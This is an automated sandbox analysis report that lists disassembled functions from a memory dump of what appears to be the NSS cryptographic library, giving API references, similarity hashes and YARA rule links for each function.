String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: deb15fb4445c2e32896c2cf26ebbbb9d795e3b6c881466fcc9e0436e1fc7d3f7
Instruction ID: 947f4c160d12ff4c50095189c55a8c0e9687230ff7d21b51c924efec94926eaf
Opcode Fuzzy Hash: deb15fb4445c2e32896c2cf26ebbbb9d795e3b6c881466fcc9e0436e1fc7d3f7
Instruction Fuzzy Hash: 49313A3064072C9FCB21CE9DCD909ABB7A0EB85718B54097DE488A7B85F365E949C3F0

Function 6C7E0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C7E0BDE), ref: 6C7E0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C7E0BDE), ref: 6C7E0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C7E0BDE), ref: 6C7E0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C7E0BDE), ref: 6C7E0E32

Strings

%s incr => %d (find lib), xrefs: 6C7E0E2D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 8c2d3f613de3cc86e740d3e510379e223c372f051bf8de4e450b55c7e06e4a74
Instruction ID: ae2500f17a9051aeaa07bb0977ddb4f85f312a11a1d15db546d01592076ebcbb
Opcode Fuzzy Hash: 8c2d3f613de3cc86e740d3e510379e223c372f051bf8de4e450b55c7e06e4a74
Instruction Fuzzy Hash: 64012472B006109FEB20AF249C49E2773ACDB49A08B15487DE909D3A41EB61EC1887E1

Function 6C83C590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C83C5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C83C603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C83C636
PK11_FreeSymKey.NSS3(?), ref: 6C83C6D7
PK11_FreeSymKey.NSS3(?), ref: 6C83C6E1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: e89ac67e74bdba128bb6ff67c186dec99ec9cbf5b4562257dc21e1dc0ced5840
Instruction ID: 1f911b6e0422cabae2b1cadca29e2c27f6afbdf644535959a077bcbf5584fe8f
Opcode Fuzzy Hash: e89ac67e74bdba128bb6ff67c186dec99ec9cbf5b4562257dc21e1dc0ced5840
Instruction Fuzzy Hash: 174194B560122AAFDB119FA8DD80DAB77A9EF18248B006938EC08D7711E731DC148BE1

Function 6C882460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C927379,00000002,?), ref: 6C882493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8824B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C927379,00000002,?), ref: 6C8824EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C927379,00000002,?), ref: 6C8824F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C927379,00000002,?), ref: 6C8824FE

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: 13a16203d93a748bd33f75053c170042a8b60a57a9f1aec5f87841c859ba21b7
Instruction ID: 77cac18f58305d84e634664ba9c02581d224427ed4e44027b01f334d4bb59c3b
Opcode Fuzzy Hash: 13a16203d93a748bd33f75053c170042a8b60a57a9f1aec5f87841c859ba21b7
Instruction Fuzzy Hash: DB31E4B1A00116AFEB209FA8DD45BBBB7A4EF48309F104925FD1896A90E735DC64C7A1

Function 6C7EEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7EEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C7EEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C7EEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7EEEEB
free.MOZGLUE(?), ref: 6C7EEEF6

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 16fbc95d5222ccc22ad372f36d8ccc991c6ed932a44354cd575b9bc90cb3c658
Instruction ID: 5c2a2e15c4d3a72fecce59f40c7933a37d39a7f90d958548d0614fb8e82ed993
Opcode Fuzzy Hash: 16fbc95d5222ccc22ad372f36d8ccc991c6ed932a44354cd575b9bc90cb3c658
Instruction Fuzzy Hash: D23107726046049BFB209F2CCD447667BF8FB4A309F640938E85A87A51E731E814CBD1

Function 6C7F44D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C7F44FF

Part of subcall function 6C8507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7F8298,?,?,?,6C7EFCE5,?), ref: 6C8507BF
Part of subcall function 6C8507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8507E6
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C85081B
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C850825

SECOID_FindOID_Util.NSS3(?), ref: 6C7F4524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7F4537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C7F4579

Part of subcall function 6C7F41B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7F41BE
Part of subcall function 6C7F41B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7F41E9
Part of subcall function 6C7F41B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C7F4227
Part of subcall function 6C7F41B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C7F423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F459C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 4c1129f10d09069bc2721193ad72453c948c4a3cd60c8ba286d8b10f64a5b2e2
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: D021D6716052009BFB12EE299FC4B7737A89F41658F140438BC35CBB51E721E906E6A1

Function 6C7FAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C7F3FFF,00000000,?,?,?,?,?,6C7F1A1C,00000000,00000000), ref: 6C7FADA7

Part of subcall function 6C8514C0: TlsGetValue.KERNEL32 ref: 6C8514E0
Part of subcall function 6C8514C0: EnterCriticalSection.KERNEL32 ref: 6C8514F5
Part of subcall function 6C8514C0: PR_Unlock.NSS3 ref: 6C85150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C7F3FFF,00000000,?,?,?,?,?,6C7F1A1C,00000000,00000000), ref: 6C7FADB4

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C7F3FFF,?,?,?,?,6C7F3FFF,00000000,?,?,?,?,?,6C7F1A1C,00000000), ref: 6C7FADD5

Part of subcall function 6C84FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C848D2D,?,00000000,?), ref: 6C84FB85
Part of subcall function 6C84FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C84FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9194B0,?,?,?,?,?,?,?,?,6C7F3FFF,00000000,?), ref: 6C7FADEC

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7F3FFF), ref: 6C7FAE3C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 7c1a7d1fd6e54d832830ea7ce9a60cdccfbae77d399e43d01d85de283e981f30
Instruction ID: 144d173a0c366012165914b9cbcdbc8e8176e04bf3bd2a21f134ca76a4b78171
Opcode Fuzzy Hash: 7c1a7d1fd6e54d832830ea7ce9a60cdccfbae77d399e43d01d85de283e981f30
Instruction Fuzzy Hash: 13117B31E002095BF7209F699D81BBF73ACDF9125DF408538EC2996741F760F55982E2

Function 6C818E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C832E62,?,?,?,?,?,?,?,00000000,?,?,?,6C804F1C), ref: 6C818EA2

Part of subcall function 6C83F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C83F854
Part of subcall function 6C83F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C83F868
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C83F882
Part of subcall function 6C83F820: free.MOZGLUE(04C483FF,?,?), ref: 6C83F889
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C83F8A4
Part of subcall function 6C83F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C83F8AB
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C83F8C9
Part of subcall function 6C83F820: free.MOZGLUE(280F10EC,?,?), ref: 6C83F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C832E62,?,?,?,?,?,?,?,00000000,?,?,?,6C804F1C), ref: 6C818EC3
TlsGetValue.KERNEL32(?,?,?,6C832E62,?,?,?,?,?,?,?,00000000,?,?,?,6C804F1C), ref: 6C818EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C832E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C818EF1
PR_Unlock.NSS3 ref: 6C818F20

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: 17bfe377e9d2f8703e788d43f687150c5fce95e19ec90409bdb2ccfcf94979fa
Instruction ID: 57f67a50a8aaff7fcf8f21b3774421e483e6f7dab6be5474c0fa0b4f3f9e7c39
Opcode Fuzzy Hash: 17bfe377e9d2f8703e788d43f687150c5fce95e19ec90409bdb2ccfcf94979fa
Instruction Fuzzy Hash: C2215C7190D6069FDB10AF29D684599BBF0FF48318F42496EEC989BB41E730E854CBD2

Function 6C8804C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C88461B,-00000004), ref: 6C8804DF
TlsGetValue.KERNEL32(?,00000000,?,6C88461B,-00000004), ref: 6C880510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C880520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C88461B,-00000004), ref: 6C880534
GetLastError.KERNEL32(?,6C88461B,-00000004), ref: 6C880543

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 59c54d8f752f852bec4d9aef6dcbcc7729d0c9f2a1f83ab92450e68f61054e9c
Instruction ID: d26b004d3d6a540a35a32c550d5494fd560c05cf45a48fb9fac4b0faaf1c10d4
Opcode Fuzzy Hash: 59c54d8f752f852bec4d9aef6dcbcc7729d0c9f2a1f83ab92450e68f61054e9c
Instruction Fuzzy Hash: 95110471A0B1465BDB206A789E18B6636A4AF0231DF714E24E429E3DD1EB31D144CAA1

Function 6C808FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C810710), ref: 6C808FF1
PR_CallOnce.NSS3(6C952158,6C809150,00000000,?,?,?,6C809138,?,6C810710), ref: 6C809029
calloc.MOZGLUE(00000001,00000000,?,?,6C810710), ref: 6C80904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C810710), ref: 6C809066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C810710), ref: 6C809078

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: c58d95ba56579646a39980a3d8fafd023a85a1a8698659f6faa160a7d271c025
Instruction ID: b01681ddfa0ad19c06a71af6ffb112f01343994554048ade991235ac2bf71c92
Opcode Fuzzy Hash: c58d95ba56579646a39980a3d8fafd023a85a1a8698659f6faa160a7d271c025
Instruction Fuzzy Hash: 7B11443270511557EB301AADAD08A6B32ACEF827ACF900D31FC88C2B81F752CD4483B1

Function 6C81CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C831E10: TlsGetValue.KERNEL32 ref: 6C831E36
Part of subcall function 6C831E10: EnterCriticalSection.KERNEL32(?,?,?,6C80B1EE,2404110F,?,?), ref: 6C831E4B
Part of subcall function 6C831E10: PR_Unlock.NSS3 ref: 6C831E76

free.MOZGLUE(?,6C81D079,00000000,00000001), ref: 6C81CDA5
PK11_FreeSymKey.NSS3(?,6C81D079,00000000,00000001), ref: 6C81CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C81D079,00000000,00000001), ref: 6C81CDCF
DeleteCriticalSection.KERNEL32(?,6C81D079,00000000,00000001), ref: 6C81CDE2
free.MOZGLUE(?), ref: 6C81CDE9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 78058b4f726618dd39c006bebe5919e9c28f7f6d22c430d53b97bd59e261500b
Instruction ID: c0d9ad5c547b0d451670d87265ade2637bcef2594312269c7e52aa709ea8e770
Opcode Fuzzy Hash: 78058b4f726618dd39c006bebe5919e9c28f7f6d22c430d53b97bd59e261500b
Instruction Fuzzy Hash: 9811C6B2B05116ABDF10AEA5ED45996B76CFF0425E7104931E90987E02E732E438C7E1

Function 6C882CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C885B40: PR_GetIdentitiesLayer.NSS3 ref: 6C885B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C882CEC

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_EnterMonitor.NSS3(?), ref: 6C882D02
PR_EnterMonitor.NSS3(?), ref: 6C882D1F
PR_ExitMonitor.NSS3(?), ref: 6C882D42
PR_ExitMonitor.NSS3(?), ref: 6C882D5B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 8b409379df21ce7edcee5358271cc76da771bc5116bf266c7f460a9ea7c24819
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 9601C4B2A012046BE6309E2DFD40BC7BBB1EF55319F004D35E85E96B20E636F8158792

Function 6C882D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C885B40: PR_GetIdentitiesLayer.NSS3 ref: 6C885B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C882D9C

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_EnterMonitor.NSS3(?), ref: 6C882DB2
PR_EnterMonitor.NSS3(?), ref: 6C882DCF
PR_ExitMonitor.NSS3(?), ref: 6C882DF2
PR_ExitMonitor.NSS3(?), ref: 6C882E0B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: fb40eea291e027868a06244fb27468d71c57728c3d2c059dae34133cd1d40aee
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: EC01A1B1A012046FEA309E29FD41BC7B7B1EF51319F000D35E85A96F11D636E82586A2

Function 6C81AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C803090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C81AE42), ref: 6C8030AA
Part of subcall function 6C803090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8030C7
Part of subcall function 6C803090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8030E5
Part of subcall function 6C803090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C803116
Part of subcall function 6C803090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C80312B
Part of subcall function 6C803090: PK11_DestroyObject.NSS3(?,?), ref: 6C803154
Part of subcall function 6C803090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C80317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7F99FF,?,?,?,?,?,?,?,?,?,6C7F2D6B,?), ref: 6C81AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7F99FF,?,?,?,?,?,?,?,?,?,6C7F2D6B,?), ref: 6C81AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7F2D6B,?,?,00000000), ref: 6C81AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C7F2D6B,?,?,00000000), ref: 6C81AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7F2D6B,?,?), ref: 6C81AEA3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
